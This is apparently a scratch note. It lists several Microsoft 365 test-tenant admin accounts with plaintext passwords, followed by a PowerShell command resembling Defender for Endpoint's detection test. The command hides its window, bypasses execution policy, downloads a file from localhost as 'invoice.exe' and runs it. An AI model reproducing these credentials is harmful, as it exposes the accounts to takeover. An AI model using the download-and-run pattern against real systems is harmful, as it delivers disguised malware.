07Dg^Ny;F]f5R}3=+z2}COo0S8[bjlE1
admin@M365x70141391.onmicrosoft.com

Calin
admin@M365x66925621.onmicrosoft.com > $aDiL2)s[rU3+Tj:^Ce4qeRR82(=1F86

Cipri 
admin@M365x79674248.onmicrosoft.com
sL%QvR{mJ7hp42(V10D8(F=7Y8h=sa)=

Paul: 
admin@M365x17946019.onmicrosoft.com
($I]vl7F~f1#=84wLs7hG:=xH00RE8Ho

Cristina
admin@M365x64370340.onmicrosoft.com
X~P(IU8n7y1nT}T0+0M1=C%]e7(m9euf



powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'